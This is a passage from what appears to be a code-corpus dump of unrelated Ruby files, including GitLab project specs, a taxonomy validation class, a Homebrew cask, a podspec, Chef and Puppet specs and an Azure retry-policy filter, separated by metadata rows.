before do
project.namespace.update_attribute(:lfs_enabled, true)
project.update_attribute(:lfs_enabled, true)
end
it_behaves_like 'it always returns false'
end
end
end
describe '#change_head' do
let(:project) { create(:project) }
it 'calls the before_change_head and after_change_head methods' do
expect(project.repository).to receive(:before_change_head)
expect(project.repository).to receive(:after_change_head)
project.change_head(project.default_branch)
end
it 'creates the new reference with rugged' do
expect(project.repository.rugged.references).to receive(:create).with('HEAD',
"refs/heads/#{project.default_branch}",
force: true)
project.change_head(project.default_branch)
end
it 'copies the gitattributes' do
expect(project.repository).to receive(:copy_gitattributes).with(project.default_branch)
project.change_head(project.default_branch)
end
it 'reloads the default branch' do
expect(project).to receive(:reload_default_branch)
project.change_head(project.default_branch)
end
end
describe '#pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
context 'without any pushes' do
it 'returns 0' do
expect(project.pushes_since_gc).to eq(0)
end
end
context 'with a number of pushes' do
it 'returns the number of pushes' do
3.times { project.increment_pushes_since_gc }
expect(project.pushes_since_gc).to eq(3)
end
end
end
describe '#increment_pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
it 'increments the number of pushes since the last GC' do
3.times { project.increment_pushes_since_gc }
expect(project.pushes_since_gc).to eq(3)
end
end
describe '#reset_pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
it 'resets the number of pushes since the last GC' do
3.times { project.increment_pushes_since_gc }
project.reset_pushes_since_gc
expect(project.pushes_since_gc).to eq(0)
end
end
describe '#environments_for' do
let(:project) { create(:project) }
let(:environment) { create(:environment, project: project) }
context 'tagged deployment' do
before do
create(:deployment, environment: environment, ref: '1.0', tag: true, sha: project.commit.id)
end
it 'returns environment when with_tags is set' do
expect(project.environments_for('master', commit: project.commit, with_tags: true))
.to contain_exactly(environment)
end
      it 'does not return environment when with_tags is not set' do
expect(project.environments_for('master', commit: project.commit))
.to be_empty
end
it 'does not return environment when commit is not part of deployment' do
expect(project.environments_for('master', commit: project.commit('feature')))
.to be_empty
end
end
context 'branch deployment' do
before do
create(:deployment, environment: environment, ref: 'master', sha: project.commit.id)
end
it 'returns environment when ref is set' do
expect(project.environments_for('master', commit: project.commit))
.to contain_exactly(environment)
end
      it 'does not return environment when ref is different' do
expect(project.environments_for('feature', commit: project.commit))
.to be_empty
end
it 'does not return environment when commit is not part of deployment' do
expect(project.environments_for('master', commit: project.commit('feature')))
.to be_empty
end
it 'returns environment when commit constraint is not set' do
expect(project.environments_for('master'))
.to contain_exactly(environment)
end
end
end
describe '#environments_recently_updated_on_branch' do
let(:project) { create(:project) }
let(:environment) { create(:environment, project: project) }
context 'when last deployment to environment is the most recent one' do
before do
create(:deployment, environment: environment, ref: 'feature')
end
it 'finds recently updated environment' do
expect(project.environments_recently_updated_on_branch('feature'))
.to contain_exactly(environment)
end
end
context 'when last deployment to environment is not the most recent' do
before do
create(:deployment, environment: environment, ref: 'feature')
create(:deployment, environment: environment, ref: 'master')
end
it 'does not find environment' do
expect(project.environments_recently_updated_on_branch('feature'))
.to be_empty
end
end
context 'when there are two environments that deploy to the same branch' do
let(:second_environment) { create(:environment, project: project) }
before do
create(:deployment, environment: environment, ref: 'feature')
create(:deployment, environment: second_environment, ref: 'feature')
end
it 'finds both environments' do
expect(project.environments_recently_updated_on_branch('feature'))
.to contain_exactly(environment, second_environment)
end
end
end
describe '#deployment_variables' do
context 'when project has no deployment service' do
let(:project) { create(:empty_project) }
it 'returns an empty array' do
expect(project.deployment_variables).to eq []
end
end
context 'when project has a deployment service' do
let(:project) { create(:kubernetes_project) }
it 'returns variables from this service' do
expect(project.deployment_variables).to include(
{ key: 'KUBE_TOKEN', value: project.kubernetes_service.token, public: false }
)
end
end
end
describe '#update_project_statistics' do
let(:project) { create(:empty_project) }
it "is called after creation" do
expect(project.statistics).to be_a ProjectStatistics
expect(project.statistics).to be_persisted
end
it "copies the namespace_id" do
expect(project.statistics.namespace_id).to eq project.namespace_id
end
it "updates the namespace_id when changed" do
namespace = create(:namespace)
project.update(namespace: namespace)
expect(project.statistics.namespace_id).to eq namespace.id
end
end
def enable_lfs
allow(Gitlab.config.lfs).to receive(:enabled).and_return(true)
end
end
| 32.802945 | 123 | 0.680994 |
ff8c544d1c5e984fd4b99855c06bdc848627d48b | 1,754 | class TaxonNameRelationship::Iczn::Invalidating::Homonym::Secondary::Secondary1961 < TaxonNameRelationship::Iczn::Invalidating::Homonym::Secondary
NOMEN_URI='http://purl.obolibrary.org/obo/NOMEN_0000292'.freeze
soft_validate(:sv_year_of_description, set: :specific_relationship, has_fix: false)
soft_validate(:sv_source_not_selected, set: :specific_relationship, has_fix: false)
soft_validate(:sv_source_after_1960, set: :specific_relationship, has_fix: false)
def self.disjoint_taxon_name_relationships
self.parent.disjoint_taxon_name_relationships +
[TaxonNameRelationship::Iczn::Invalidating::Homonym::Secondary.to_s]
end
def object_status
'senior secondary homonym'
end
def subject_status
'secondary homonym replaced before 1961'
end
def self.assignment_method
# bus.set_as_iczn_secondary_homonym_before_1961_of(aus)
:iczn_set_as_secondary_homonym_before_1961_of
end
def self.inverse_assignment_method
# aus.iczn_secondary_homonym_before_1961 = bus
:iczn_secondary_homonym_before_1961
end
def sv_year_of_description
s = subject_taxon_name
soft_validations.add(:type, "#{s.cached_html_name_and_author_year} was not described before 1961") if s.year_of_publication && s.year_of_publication > 1960
end
def sv_source_not_selected
soft_validations.add(:base, 'The original publication is not selected') unless source
end
def sv_source_after_1960
if self.source
s = subject_taxon_name
soft_validations.add(:base, "#{s.cached_html_name_and_author_year} should not be treated as a homonym established before 1961") if self.source.year > 1960
end
end
def sv_same_genus
true
end
def sv_specific_relationship
true
end
end
| 30.241379 | 160 | 0.782212 |
1a04f60eca1e0a9b795890dea9c3d75ffc7aa69d | 556 | $small_hash = {
[[770637937]] => 18,
[442227972, :E2WngMu6vy] => 5,
:jaWa => 0,
:E0R5HN7hX => 14,
700648627 => 6,
639030613 => 12,
348421750 => 16,
[[:qpMHyZacFmMU]] => 8,
:SlBkyplxcZ => 17,
144371495 => 1,
[596739929] => 9,
385412024 => 4,
[673910393] => 19,
471761289 => 13,
[:E7, 949213064] => 10,
:yWcqadXwyg => 3,
[[[[[:rzW63YCk8, 379991405]]]], 911063042] => 7,
344267835 => 15,
:yJjeRw => 11,
[[[:gIVP], 56874545], [[:d2G1ZCONKq, [884339273, :PA4vYV6dlOv]], [[[[:kI1pIzVGbfuJ], 701032940]], :u7H5]]] => 2,
}
| 23.166667 | 114 | 0.548561 |
1dc2b97ff98cc497f1003a7c553058a4dfe6ca22 | 804 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
User.delete_all
admin = User.create(email: "[email protected]", password: 'password')
admin.add_role :admin
REDIS_ADS.flushdb
REDIS_IMPR.flushdb
REDIS_KW.flushdb
Click.delete_all
Ad.delete_all
10.times do |i|
Ad.create(keywords: "keyword#{rand((1..5))}", cpc: rand(1..10), budget: rand(20..50),
title: "title#{i}", body: "body#{i}", link: "http://website#{i}.com")
end
10.times do |i|
REDIS_KW.incrby("keyword#{i}", i)
end
| 28.714286 | 111 | 0.699005 |
08ddd2b100445f064b3d9de6260441a6ec4d49e7 | 458 | class Teacher < ActiveRecord::Base
before_save { self.email = email.downcase }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-.]+\.[a-z]+\z/i
validates :name, presence: true, length: { maximum: 50 }
validates :email, presence: true, length: { maximum: 250},
format: { with: VALID_EMAIL_REGEX },
uniqueness: { case_sensitive: false }
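  # Illustrative note (not part of the original model): VALID_EMAIL_REGEX above
  # accepts something@domain.tld, case-insensitively. The addresses below are
  # hypothetical examples of what it matches and rejects:
  #
  #   "[email protected]" =~ VALID_EMAIL_REGEX  # => 0   (match)
  #   "user@example"           =~ VALID_EMAIL_REGEX  # => nil (no ".tld" part)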
has_secure_password
validates :password, length: { minimum: 6 }
has_many :classrooms
end
| 32.714286 | 61 | 0.646288 |
6116cf641b24f247be2a41d374e1aa4b1016e325 | 537 | cask 'radarr' do
version '0.2.0.654'
sha256 'c0aa3875ee49383e06b34abcfb86b5d1bce746970e0a20dd396d5a6c076b77d4'
# github.com/Radarr/Radarr was verified as official when first introduced to the cask
url "https://github.com/Radarr/Radarr/releases/download/v#{version}/Radarr.develop.#{version}.osx-app.zip"
appcast 'https://github.com/Radarr/Radarr/releases.atom',
checkpoint: 'd86e5406dd44ed06fee747cf5d3c8468023befbd7ba9e8fe15874a355ea0f624'
name 'Radarr'
homepage 'https://radarr.video/'
app 'Radarr.app'
end
| 38.357143 | 108 | 0.772812 |
f8a37d952930dffff3a99665ecf35ee4bfea76c4 | 590 | class <%= migration_class_name %> < ActiveRecord::Migration<%= migration_version %>
def change
create_table :<%= job_log_table_name %> do |t|
t.string :sidekiq_jid, :null => false
t.string :status
t.string :item_type
t.text :args, limit: 4294967295
t.boolean :retry, null: false, default: false
t.string :queue
t.text :backtrace, limit: 4294967295
t.datetime :finished_at
t.timestamps
end
add_index :<%= job_log_table_name %>, :sidekiq_jid, :unique => true
add_index :<%= job_log_table_name %>, :updated_at
end
end
| 31.052632 | 83 | 0.652542 |
184eec4faae473f0f16b9dba82b3facf5701f94f | 1,485 |
Pod::Spec.new do |s|
s.name = 'NJDYPlayer'
s.version = '1.0.0'
s.summary = 'NJDYPlayer, NJDYPlayer'
s.homepage = 'https://github.com/njhu/NJDYPlayer'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'njhu' => '[email protected]' }
s.social_media_url = 'http://weibo.com/njhu'
#s.source = { :git => 'https://github.com/njhu/NJDYPlayer.git', :tag => s.version.to_s }
s.source = { :git => 'https://github.com/njhu/NJDYPlayer.git', :branch =>'master' }
s.description = <<-DESC
NJDYPlayer, NJDYPlayer, NJDYPlayer, NJDYPlayer, NJDYPlayer, NJDYPlayer, NJDYPlayer
DESC
s.ios.deployment_target = '10.3'
s.requires_arc = true
s.static_framework = true
  # Uncomment for debugging/development
s.source_files = 'NJDYPlayer/Classes/**/*'
  # Uncomment for release
  # Subspecs (second-level directories)
#s.subspec 'Controller' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/Controller/*.{swift,xib}'
#end
#
#s.subspec 'Model' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/Model/*.{swift}'
#end
#
#s.subspec 'View' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/View/*.{swift,xib}'
#end
#
#s.subspec 'ViewModel' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/ViewModel/*.{swift}'
#end
#
#s.subspec 'Other' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/Other/*.{swift}'
#end
  # Subspecs (second-level directories)
s.resource_bundles = {
'NJDYPlayer' => ['NJDYPlayer/Assets/**/*.{plist,webp,png,xcassets}']
}
#s.dependency 'NJKit'
s.frameworks = 'UIKit'
s.dependency 'NJIJKPlayer'
end
| 24.75 | 98 | 0.63569 |
ace2ad24e3c562b76446e1eec0be79a4064771b4 | 8,832 | #
# Author:: AJ Christensen (<[email protected]>)
# Copyright:: Copyright (c) 2008 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
describe Chef::Provider::Service::Invokercd, "load_current_resource" do
before(:each) do
@node = Chef::Node.new
@node.automatic_attrs[:command] = {:ps => "ps -ef"}
@events = Chef::EventDispatch::Dispatcher.new
@run_context = Chef::RunContext.new(@node, {}, @events)
@new_resource = Chef::Resource::Service.new("chef")
@current_resource = Chef::Resource::Service.new("chef")
@provider = Chef::Provider::Service::Invokercd.new(@new_resource, @run_context)
Chef::Resource::Service.stub!(:new).and_return(@current_resource)
@stdout = StringIO.new(<<-PS)
aj 7842 5057 0 21:26 pts/2 00:00:06 vi init.rb
aj 7903 5016 0 21:26 pts/5 00:00:00 /bin/bash
aj 8119 6041 0 21:34 pts/3 00:00:03 vi init_service_spec.rb
PS
@status = mock("Status", :exitstatus => 0, :stdout => @stdout)
@provider.stub!(:shell_out!).and_return(@status)
end
it "should create a current resource with the name of the new resource" do
@provider.load_current_resource
@provider.current_resource.should equal(@current_resource)
end
it "should set the current resources service name to the new resources service name" do
@provider.load_current_resource
@current_resource.service_name.should == 'chef'
end
describe "when the service supports status" do
before do
@new_resource.supports({:status => true})
end
it "should run '/usr/sbin/invoke-rc.d service_name status'" do
@provider.should_receive(:shell_out).with("/usr/sbin/invoke-rc.d #{@current_resource.service_name} status").and_return(@status)
@provider.load_current_resource
end
it "should set running to true if the the status command returns 0" do
@provider.stub!(:shell_out).with("/usr/sbin/invoke-rc.d #{@current_resource.service_name} status").and_return(@status)
@provider.load_current_resource
@current_resource.running.should be_true
end
it "should set running to false if the status command returns anything except 0" do
@status.stub!(:exitstatus).and_return(1)
@provider.stub!(:shell_out).with("/usr/sbin/invoke-rc.d #{@current_resource.service_name} status").and_return(@status)
@provider.load_current_resource
@current_resource.running.should be_false
end
it "should set running to false if the status command raises" do
@provider.stub!(:shell_out).with("/usr/sbin/invoke-rc.d #{@current_resource.service_name} status").and_raise(Mixlib::ShellOut::ShellCommandFailed)
@provider.load_current_resource
@current_resource.running.should be_false
end
end
describe "when a status command has been specified" do
before do
@new_resource.stub!(:status_command).and_return("/usr/sbin/invoke-rc.d chefhasmonkeypants status")
end
it "should run the services status command if one has been specified" do
@provider.should_receive(:shell_out).with("/usr/sbin/invoke-rc.d chefhasmonkeypants status").and_return(@status)
@provider.load_current_resource
end
end
describe "when the node has not specified a ps command" do
it "should raise error if the node has a nil ps attribute and no other means to get status" do
@node.automatic_attrs[:command] = {:ps => nil}
@provider.action = :start
@provider.define_resource_requirements
lambda { @provider.process_resource_requirements }.should raise_error(Chef::Exceptions::Service)
end
it "should raise error if the node has an empty ps attribute and no other means to get status" do
@node.automatic_attrs[:command] = {:ps => ""}
@provider.action = :start
@provider.define_resource_requirements
lambda { @provider.process_resource_requirements }.should raise_error(Chef::Exceptions::Service)
end
end
describe "when we have a 'ps' attribute" do
it "should shell_out! the node's ps command" do
@status = mock("Status", :exitstatus => 0, :stdout => @stdout)
@provider.should_receive(:shell_out!).with(@node[:command][:ps]).and_return(@status)
@provider.load_current_resource
end
it "should set running to true if the regex matches the output" do
@stdout = StringIO.new(<<-RUNNING_PS)
aj 7842 5057 0 21:26 pts/2 00:00:06 chef
aj 7842 5057 0 21:26 pts/2 00:00:06 poos
RUNNING_PS
@status = mock("Status", :exitstatus => 0, :stdout => @stdout)
@provider.should_receive(:shell_out!).and_return(@status)
@provider.load_current_resource
@current_resource.running.should be_true
end
it "should set running to false if the regex doesn't match" do
@status = mock("Status", :exitstatus => 0, :stdout => @stdout)
@provider.should_receive(:shell_out!).and_return(@status)
@provider.load_current_resource
@current_resource.running.should be_false
end
it "should raise an exception if ps fails" do
@provider.stub!(:shell_out!).and_raise(Mixlib::ShellOut::ShellCommandFailed)
@provider.action = :start
@provider.load_current_resource
@provider.define_resource_requirements
lambda { @provider.process_resource_requirements }.should raise_error(Chef::Exceptions::Service)
end
end
it "should return the current resource" do
@provider.load_current_resource.should eql(@current_resource)
end
describe "when starting the service" do
it "should call the start command if one is specified" do
@new_resource.start_command("/usr/sbin/invoke-rc.d chef startyousillysally")
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d chef startyousillysally")
@provider.start_service()
end
it "should call '/usr/sbin/invoke-rc.d service_name start' if no start command is specified" do
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d #{@new_resource.service_name} start")
@provider.start_service()
end
end
describe Chef::Provider::Service::Invokercd, "stop_service" do
it "should call the stop command if one is specified" do
@new_resource.stop_command("/usr/sbin/invoke-rc.d chef itoldyoutostop")
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d chef itoldyoutostop")
@provider.stop_service()
end
it "should call '/usr/sbin/invoke-rc.d service_name stop' if no stop command is specified" do
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d #{@new_resource.service_name} stop")
@provider.stop_service()
end
end
describe "when restarting a service" do
it "should call 'restart' on the service_name if the resource supports it" do
@new_resource.supports({:restart => true})
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d #{@new_resource.service_name} restart")
@provider.restart_service()
end
it "should call the restart_command if one has been specified" do
@new_resource.restart_command("/usr/sbin/invoke-rc.d chef restartinafire")
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d #{@new_resource.service_name} restartinafire")
@provider.restart_service()
end
it "should just call stop, then start when the resource doesn't support restart and no restart_command is specified" do
@provider.should_receive(:stop_service)
@provider.should_receive(:sleep).with(1)
@provider.should_receive(:start_service)
@provider.restart_service()
end
end
describe "when reloading a service" do
it "should call 'reload' on the service if it supports it" do
@new_resource.supports({:reload => true})
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d chef reload")
@provider.reload_service()
end
it "should should run the user specified reload command if one is specified and the service doesn't support reload" do
@new_resource.reload_command("/usr/sbin/invoke-rc.d chef lollerpants")
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d chef lollerpants")
@provider.reload_service()
end
end
end
| 41.464789 | 152 | 0.710145 |
6af295243e559d4b71127da6367261d3ce277e20 | 3,100 | # frozen_string_literal: true
#-------------------------------------------------------------------------
# # Copyright (c) Microsoft and contributors. All rights reserved.
#
# The MIT License(MIT)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#--------------------------------------------------------------------------
require "azure/core"
require "azure/core/http/retry_policy"
module Azure::Storage::Common::Core::Filter
class ExponentialRetryPolicyFilter < RetryPolicyFilter
def initialize(retry_count = nil, min_retry_interval = nil, max_retry_interval = nil)
@retry_count = retry_count || ExponentialRetryPolicyFilter::DEFAULT_RETRY_COUNT
@min_retry_interval = min_retry_interval || ExponentialRetryPolicyFilter::DEFAULT_MIN_RETRY_INTERVAL
@max_retry_interval = max_retry_interval || ExponentialRetryPolicyFilter::DEFAULT_MAX_RETRY_INTERVAL
super @retry_count, @min_retry_interval
end
attr_reader :min_retry_interval,
:max_retry_interval
DEFAULT_RETRY_COUNT = 3
DEFAULT_MIN_RETRY_INTERVAL = 10
DEFAULT_MAX_RETRY_INTERVAL = 90
# Overrides the base class implementation of call to determine
# how the HTTP request should continue retrying
#
# retry_data - Hash. Stores stateful retry data
#
# The retry_data is a Hash which can be used to store
# stateful data about the request execution context (such as an
# incrementing counter, timestamp, etc). The retry_data object
# will be the same instance throughout the lifetime of the request
def apply_retry_policy(retry_data)
# Adjust retry count
retry_data[:count] = retry_data[:count] === nil ? 1 : retry_data[:count] + 1
# Adjust retry interval
increment_delta = (@max_retry_interval - @min_retry_interval).fdiv(2**(@retry_count - 1)) * (2**(retry_data[:count] - 1));
retry_data[:interval] = retry_data[:interval] === nil ? @min_retry_interval : [@min_retry_interval + increment_delta, @max_retry_interval].min;
end
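    # Illustrative sketch (not from the original source): with the defaults above
    # (DEFAULT_RETRY_COUNT = 3, 10s minimum, 90s maximum), repeated calls grow the
    # wait exponentially up to the cap. The hash below is hypothetical caller state:
    #
    #   filter = ExponentialRetryPolicyFilter.new
    #   data = {}
    #   filter.apply_retry_policy(data)  # data[:count] == 1, data[:interval] == 10
    #   filter.apply_retry_policy(data)  # data[:count] == 2, data[:interval] == 50
    #   filter.apply_retry_policy(data)  # data[:count] == 3, data[:interval] == 90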
end
end
| 47.692308 | 150 | 0.700968 |
bbe3d4d044abd692ef433dd0f58534bf4e806253 | 3,778 | require 'rspec'
require_relative './renderer.rb'
describe 'Renderer' do
describe '#render' do
subject(:renderer) { Renderer.new }
let(:binary_update_1) do
update = double('BinaryUpdate')
allow(update).to receive(:old_version) { '1.1.0' }
allow(update).to receive(:new_version) { '1.3.0' }
update
end
let(:binary_update_2) do
update = double('BinaryUpdate')
allow(update).to receive(:old_version) { '1.2.0' }
allow(update).to receive(:new_version) { '1.4.0' }
update
end
let(:binary_updates) do
updates = double('BinaryUpdates')
allow(updates).to receive(:each).and_yield('binary-1', binary_update_1).and_yield('binary-2', binary_update_2)
updates
end
let(:task_updates) do
updates = double('TaskUpdates')
allow(updates).to receive(:new_tasks).and_return(['new-task'])
allow(updates).to receive(:deleted_tasks).and_return(['deleted-task'])
allow(updates).to receive(:updated_tasks).and_return(['updated-task'])
updates
end
it 'includes a section header for Notices' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include ("## Notices")
end
    it 'includes a section header for Notices, as well as sub-headers for New, Updated, and Deleted Tasks' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include (
<<-NOTICES
## Notices
### :point_right: New Tasks :point_left:
-**`new-task`**
### :point_right: Updated Tasks :point_left:
-**`updated-task`**
### :point_right: Deleted Tasks :point_left:
-**`deleted-task`**
NOTICES
)
end
    it 'includes a section header for Binary Updates' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include ("## Binary Updates\n")
end
describe 'Binary table' do
it 'includes a header' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include(
<<-HEADER
| Binary | Old Version | New Version |
| ------- | ----------- | ----------- |
HEADER
)
end
it 'places the table header immediately after the section header' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include ("## Binary Updates\n| Binary | Old Version | New Version |")
end
it 'shows the binary name, old version, and new version for each binary' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include('| binary-1 | 1.1.0 | 1.3.0 |')
expect(rendered_output).to include('| binary-2 | 1.2.0 | 1.4.0 |')
end
context 'when some versions are nil' do
let(:binary_update_1) do
update = double('BinaryUpdate')
allow(update).to receive(:old_version) { '1.1.0' }
allow(update).to receive(:new_version) { nil }
update
end
let(:binary_update_2) do
update = double('BinaryUpdate')
allow(update).to receive(:old_version) { nil }
allow(update).to receive(:new_version) { '1.4.0' }
update
end
it 'renders them as empty strings' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include('| binary-1 | 1.1.0 | |')
expect(rendered_output).to include('| binary-2 | | 1.4.0 |')
end
end
end
end
end
| 34.345455 | 116 | 0.650873 |
e256d5858452ab4cf418cd42b6cb3739518b23f8 | 200 | require 'spec_helper'
describe TvTonight do
it 'has a version number' do
expect(TvTonight::VERSION).not_to be nil
end
it 'does something useful' do
expect(false).to eq(true)
end
end
| 16.666667 | 44 | 0.71 |
01cf78beec0e0f3b9e1113cfc4b1b48c588d2f1a | 12,050 | require 'spec_helper'
describe 'apache::mod::passenger', :type => :class do
let :pre_condition do
'include apache'
end
context "on a Debian OS" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '6',
:kernel => 'Linux',
:concat_basedir => '/dne',
:lsbdistcodename => 'squeeze',
:operatingsystem => 'Debian',
:id => 'root',
:kernel => 'Linux',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_apache__mod('zpassenger') }
it { is_expected.to contain_package("libapache2-mod-passenger") }
it { is_expected.to contain_file('zpassenger.load').with({
'path' => '/etc/apache2/mods-available/zpassenger.load',
}) }
it { is_expected.to contain_file('passenger.conf').with({
'path' => '/etc/apache2/mods-available/passenger.conf',
}) }
it { is_expected.to contain_file('passenger_package.conf').with_ensure('absent') }
describe "with passenger_root => '/usr/lib/example'" do
let :params do
{ :passenger_root => '/usr/lib/example' }
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr/lib/example"}) }
end
describe "with passenger_ruby => /usr/lib/example/ruby" do
let :params do
{ :passenger_ruby => '/usr/lib/example/ruby' }
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRuby "/usr/lib/example/ruby"}) }
end
describe "with passenger_default_ruby => /usr/lib/example/ruby1.9.3" do
let :params do
{ :passenger_ruby => '/usr/lib/example/ruby1.9.3' }
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRuby "/usr/lib/example/ruby1.9.3"}) }
end
describe "with passenger_high_performance => on" do
let :params do
{ :passenger_high_performance => 'on' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerHighPerformance on$/) }
end
describe "with passenger_pool_idle_time => 1200" do
let :params do
{ :passenger_pool_idle_time => 1200 }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerPoolIdleTime 1200$/) }
end
describe "with passenger_max_requests => 20" do
let :params do
{ :passenger_max_requests => 20 }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerMaxRequests 20$/) }
end
describe "with passenger_stat_throttle_rate => 10" do
let :params do
{ :passenger_stat_throttle_rate => 10 }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerStatThrottleRate 10$/) }
end
describe "with passenger_max_pool_size => 16" do
let :params do
{ :passenger_max_pool_size => 16 }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerMaxPoolSize 16$/) }
end
describe "with rack_autodetect => on" do
let :params do
{ :rack_autodetect => 'on' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ RackAutoDetect on$/) }
end
describe "with rails_autodetect => on" do
let :params do
{ :rails_autodetect => 'on' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ RailsAutoDetect on$/) }
end
describe "with passenger_use_global_queue => on" do
let :params do
{ :passenger_use_global_queue => 'on' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerUseGlobalQueue on$/) }
end
describe "with passenger_app_env => 'foo'" do
let :params do
{ :passenger_app_env => 'foo' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerAppEnv foo$/) }
end
describe "with mod_path => '/usr/lib/foo/mod_foo.so'" do
let :params do
{ :mod_path => '/usr/lib/foo/mod_foo.so' }
end
it { is_expected.to contain_file('zpassenger.load').with_content(/^LoadModule passenger_module \/usr\/lib\/foo\/mod_foo\.so$/) }
end
describe "with mod_lib_path => '/usr/lib/foo'" do
let :params do
{ :mod_lib_path => '/usr/lib/foo' }
end
it { is_expected.to contain_file('zpassenger.load').with_content(/^LoadModule passenger_module \/usr\/lib\/foo\/mod_passenger\.so$/) }
end
describe "with mod_lib => 'mod_foo.so'" do
let :params do
{ :mod_lib => 'mod_foo.so' }
end
it { is_expected.to contain_file('zpassenger.load').with_content(/^LoadModule passenger_module \/usr\/lib\/apache2\/modules\/mod_foo\.so$/) }
end
describe "with mod_id => 'mod_foo'" do
let :params do
{ :mod_id => 'mod_foo' }
end
it { is_expected.to contain_file('zpassenger.load').with_content(/^LoadModule mod_foo \/usr\/lib\/apache2\/modules\/mod_passenger\.so$/) }
end
context "with Ubuntu 12.04 defaults" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '12.04',
:kernel => 'Linux',
:operatingsystem => 'Ubuntu',
:lsbdistrelease => '12.04',
:concat_basedir => '/dne',
:id => 'root',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr"}) }
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRuby "/usr/bin/ruby"}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerDefaultRuby/) }
end
context "with Ubuntu 14.04 defaults" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '14.04',
:operatingsystem => 'Ubuntu',
:kernel => 'Linux',
:lsbdistrelease => '14.04',
:concat_basedir => '/dne',
:id => 'root',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr/lib/ruby/vendor_ruby/phusion_passenger/locations.ini"}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerRuby/) }
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerDefaultRuby "/usr/bin/ruby"}) }
end
context "with Debian 7 defaults" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '7.3',
:operatingsystem => 'Debian',
:kernel => 'Linux',
:lsbdistcodename => 'wheezy',
